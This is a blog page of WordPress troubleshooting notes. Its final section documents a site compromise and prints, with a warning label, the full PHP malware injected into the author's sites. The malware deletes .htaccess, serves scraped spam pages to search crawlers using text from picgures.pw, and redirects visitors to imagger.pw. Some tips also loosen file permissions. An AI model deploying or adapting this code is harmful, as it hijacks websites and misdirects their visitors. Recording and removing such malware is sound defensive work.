Tagged: wordpress

Change WordPress index page content without affect the widget section.

Problem: Want to change WordPress index page content from post to page.

Solution: First go to /var/www/html/passive_income/wp-content/themes/twentyseventeen/index.php, follow below content

<?php
/**
 * The main template file
 *
 * This is the most generic template file in a WordPress theme
 * and one of the two required files for a theme (the other being style.css).
 * It is used to display a page when nothing more specific matches a query.
 * E.g., it puts together the home page when no home.php file exists.
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package WordPress
 * @subpackage Twenty_Seventeen
 * @since 1.0
 * @version 1.0
 */

get_header(); ?>

<div class="wrap">
	<?php if ( is_home() && ! is_front_page() ) : ?>
		<header class="page-header">
			<h1 class="page-title"><?php single_post_title(); ?></h1>
		</header>
	<?php else : ?>
	<header class="page-header">
		<h2 class="page-title"><?php _e( 'Posts', 'twentyseventeen' ); ?></h2>
	</header>
	<?php endif; ?>

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">
   
			<?php
			if ( have_posts() ) :

				/* Start the Loop */
			//	while ( have_posts() ) :
			//		the_post();

					/*
					 * Include the Post-Format-specific template for the content.
					 * If you want to override this in a child theme, then include a file
					 * called content-___.php (where ___ is the Post Format name) and that will be used instead.
					 */
		 //	get_template_part( 'template-parts/post/content', get_post_format() );
	 $id = 1267;
 $post = get_page($id);
 $content = apply_filters('the_content', $post->post_content);
 echo $content;
//https://www.passiveincomehk.com/wp-admin/post.php?post=1267
				//endwhile;

			/*	the_posts_pagination(
					array(
						'prev_text'          => twentyseventeen_get_svg( array( 'icon' => 'arrow-left' ) ) . '<span class="screen-reader-text">' . __( 'Previous page', 'twentyseventeen' ) . '</span>',
						'next_text'          => '<span class="screen-reader-text">' . __( 'Next page', 'twentyseventeen' ) . '</span>' . twentyseventeen_get_svg( array( 'icon' => 'arrow-right' ) ),
						'before_page_number' => '<span class="meta-nav screen-reader-text">' . __( 'Page', 'twentyseventeen' ) . ' </span>',
					)
				);*/

			else :

				get_template_part( 'template-parts/post/content', 'none' );

			endif;
			?>

		</main><!-- #main -->
	</div><!-- #primary -->
	<?php get_sidebar(); ?>
</div><!-- .wrap -->

<?php
get_footer();

keep in mind that the replace $id = 1267; 1267 is the page id.

Fatal error: Uncaught Error: Call to undefined function set_magic_quotes_runtime() in WordPress

Problem: When trying to import RSS via a built-in plugin, there is an error occurred Call to undefined function set_magic_quotes_runtime()

If you are using PHP 5.3 or after, set_magic_quotes_runtime() is already deprecated, although it will not cause a Fatal error it will send an E_DEPRECATED warning.

Solution: Remove all set_magic_quotes_runtime() in the WordPress project

Remove author name from every post in WordPress

Problem: the author’s name always shows as “Root” which is meaningless to the reader.

Solution: First go to /wp-content/themes/twentyseventeen/ folder, since I use twentyseventeen so I go to twentyseventeen folder, please change to your theme folder according to your website theme using.

then search “post author” in template-tags.php file, or find it on functions.php file, you will see similar content below(except the function name is different):

function twentynineteen_posted_by() {
        printf(
            /* translators: 1: SVG icon. 2: post author, only visible to screen readers. 3: author link. */
            '<span class="byline">%1$s<span class="screen-reader-text">%2$s</span><span class="author vcard"><a class="url fn n" href="%3$s">%4$s</a></span></span>',
            twentynineteen_get_icon_svg( 'person', 16 ),
            __( 'Posted by', 'twentynineteen' ),
            esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ),
            esc_html( get_the_author() )
        );
    }
endif;

remove all the content and save:

function twentynineteen_posted_by() {
}
endif;

Error “cURL error 18: transfer closed with 7622473 bytes remaining to read” occurred when upgrading WordPress.

Problem: When trying to upgrade WordPress to version 5.3.1. There are a message showing that the installation failed.

After googling the error message. I find out that it caused by a Google plugin.

Solution: In my case, it caused by the Chrome plugin problem; If you install some plugin that will block recourse or URL like AdBlock, Privacy Badger. please turn it off first, or use another browser to upgrade WordPress.

Require FTP login when installing WordPress plugins

Problem: when trying to install a plugin via whether manually upload or WordPress plugin page. There is a pop-up box that requires you to fill FTP username and password.

If people do not know their FTP login username and password, they never able to install wp plugin 🙁

Solution: In wp-config.php , add below line at the end of the file

define('FS_METHOD', 'direct' );

to force WordPress to write files directly. And you may also need to change the permission in wp-content and wp-includes

For the risk of adding FS_METHOD DIRECT please check out this post.

WordPress image in poor quality/ image being resized

Problem: Upload some images with high quality, somehow showing a poor quality or showing a resized image URL at the end.

There are a few possible things causing this like third party plugin and auto-cropping images function.

Solution: First if you installed some optimize tools like Jetpack please disable it or turn off Image Accelerator.

According to this post, add below code into functions.php located in the themes folder that you are using.

add_filter( 'post_thumbnail_html', 'remove_wps_width_attribute', 10 );
add_filter( 'image_send_to_editor', 'remove_wps_width_attribute', 10 );
  
function remove_wps_width_attribute( $html ) {
    $html = preg_replace( '/(width|height)=\"\d*\"\s/', "", $html );
    return $html;
}

or according to this, add below code to remove size attribute

add_filter( 'wp_calculate_image_srcset_meta', '__return_null' );

WordPress plugin install/update: Could not create directory

Problem: Try to install or update a plugin in WordPress by upload file or install package in WordPress. The user got this error: Could not create directory. (path) or An error occurred while updating (package): Could not create directory

Solution: Enter command in your porject: chown -R www-data:www-data wp-content

Website written by PHP (WordPress, OpenCart) Hacked by malware which starting with $user_agent_to_filter

How to find it: enter command --

sudo grep -r 'user_agent_to_filter' --include *.php /var/www

Problem:

1) The website may be tagged with “This site may be hacked” in Google search results.

2) The website with HTTPS will return error 500.

3) The website with non-HTTPS will be treated as a dangerous page by some Antivirus Software since it being injected an iframe to redirect a user to another website.

Solution:

  1. Update WordPress update plugin (wordfence)
  2. Change folder permission to 775 (or follow the original repository’s permission setting)
  3. Enforced SSL
  4. Delete all the infected files (You can find them all using sudo grep -r ‘user_agent_to_filter’ --include *.php /var/www/html)
  5. Use Cloudflare 🙂
Some of my websites (WordPress, OpenCart) have these injected files. The above images indicate these injected files located in /image/cache/catalog/demo/product/ on OpenCart platform

Below code is the injected content, Other websites also mentioned this malware. I will attached the links below.

<?php
// Below infected code is malware! Do not use it

$f1 = ".ht"; $f2 = "acc"; $f3 = "ess";
$ff = $f1.$f2.$f3;

if (file_exists($ff)) chmod ($ff, 0777);
if (file_exists($ff)) unlink ($ff);	

$cache_folder = "wtuds";
$template_folder = "nptoris";

$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
                               '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
                               '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
                               '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
                               '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
                               '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
                               '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
                               '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
                               '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
                               '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
                               '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
                               '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
                               '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
                               '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
                               '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
                               '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
                               '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
                               '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;

if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
    $isbot = 1;
	}

if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google')) 
{
    $isbot = 1;
}



if ($isbot)
{
	
	$myname = $cache_folder."/".$_GET["jgyhdhuy"];
	if (file_exists($myname))
	{
	$html = file($myname);
	$html = implode($html, "");
	echo $html;
	exit;
	}
	
$template = scandir($template_folder);
$template = $template[rand(2,sizeof($template)-1)];
$tpl = $template_folder."/".$template;
$tpl = file($tpl);


$keyword = str_replace("-", " ", $_GET["jgyhdhuy"]);
$keyword = chop($keyword);
$keyword = ucfirst($keyword);


 $query_pars = $keyword;
 $query_pars_2 = str_replace(" ", "+", chop($query_pars));
 $query_pars_2 = mb_strtolower($query_pars_2);

 $text = ""; 
 
 $ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "http://picgures.pw/story2.php?q=$query_pars_2&pass=qwerty8"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$text = curl_exec($ch); 
curl_close($ch);
 
 if (strlen($text)<1000)
 {
	 
	 for ($page=1;$page<145;$page=$page+10)
{
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "https://www4.bing.com/search?q=$query_pars_2&first=$page"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); 
//curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
$result = curl_exec($ch); 
curl_close($ch);
//echo $result;	

		preg_match_all ("#</div><p>(.*)</p></div>#iU",$result,$m);
		foreach ($m[1] as $a) $text .= $a;	

}
 
	
$text = str_replace("...", "", $text);
		$text = strip_tags($text); 
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);

		$text = explode(".", $text);
		shuffle($text);
		$text = array_unique($text);
		$text = implode(". ", $text);
 }

     	$html = implode ("\n", $tpl);
/*		
$titlename = $_SERVER['SERVER_NAME'];	
$titlename = explode(".", $titlename);
$titlename = strtoupper($titlename[0]);
if (strlen($titlename)>1) $html=str_replace("<title>{keyword}</title>", "<title>$keyword | $titlename</title>", $html);		
	*/	
		$html = str_replace("{keyword}", $keyword, $html);
		$html = str_replace("{manytext_bing}", $text, $html);
		
		$out = fopen($myname, "w");
		fwrite($out, $html);
		fclose($out);

		echo $html;
		
}	

if([email protected]$isbot)
{

$keyword = str_replace("-", " ", $_GET["jgyhdhuy"]);
$keyword = str_replace(" ", "+", $keyword);

$ref = $_SERVER["HTTP_REFERER"];
$d = $_SERVER["HTTP_HOST"];
$mykeys  = $_GET["jgyhdhuy"];

header("Location: http://imagger.pw/sf/77?d=$d&mykeys=$mykeys");

exit;
}

?>

Other relevant resources:

http://chensd.com/2011-09/a-wordpress-trojan-analyst.html (simplified chinese)
https://stackoverflow.com/questions/44534667/wordpress-website-hacked-according-to-google-is-it-really
https://blog.sucuri.net/2012/06/understanding-conditional-malware-ip-centric-variation.html
https://www.biaodianfu.com/site-hacked.html (simplified chinese)